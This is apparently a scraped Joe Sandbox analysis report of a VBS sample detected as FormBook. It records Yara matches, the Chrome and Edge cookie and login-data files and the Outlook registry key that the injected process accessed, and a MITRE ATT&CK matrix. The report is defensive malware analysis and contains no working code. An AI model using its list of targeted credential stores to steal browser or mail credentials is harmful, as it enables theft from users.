Source: Yara match	File source: 00000009.00000002.2694604263.0000000004860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1801650290.00000000039A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2689886267.0000000002980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\sxstrace.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\sxstrace.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: x.exe	Binary or memory string: WIN_81
Source: x.exe	Binary or memory string: WIN_XP
Source: x.exe	Binary or memory string: WIN_XPe
Source: x.exe	Binary or memory string: WIN_VISTA
Source: x.exe	Binary or memory string: WIN_7
Source: x.exe	Binary or memory string: WIN_8
Source: x.exe.3.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2694334630.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1802111485.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2694722151.0000000002FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1801343865.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2696950833.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2694604263.0000000004860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1801650290.00000000039A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2689886267.0000000002980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E96283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		5_2_00E96283
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E96747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		5_2_00E96747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	221 Scripting	2 Valid Accounts	2 Native API	221 Scripting	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	2 Valid Accounts	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	127 System Information Discovery	Distributed Component Object Model	21 Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 Software Packing	LSA Secrets	251 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	512 Process Injection	1 DLL Side-Loading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Valid Accounts	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	31 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	21 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	512 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report doc00250120.Vbs.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
doc00250120.Vbs.vbs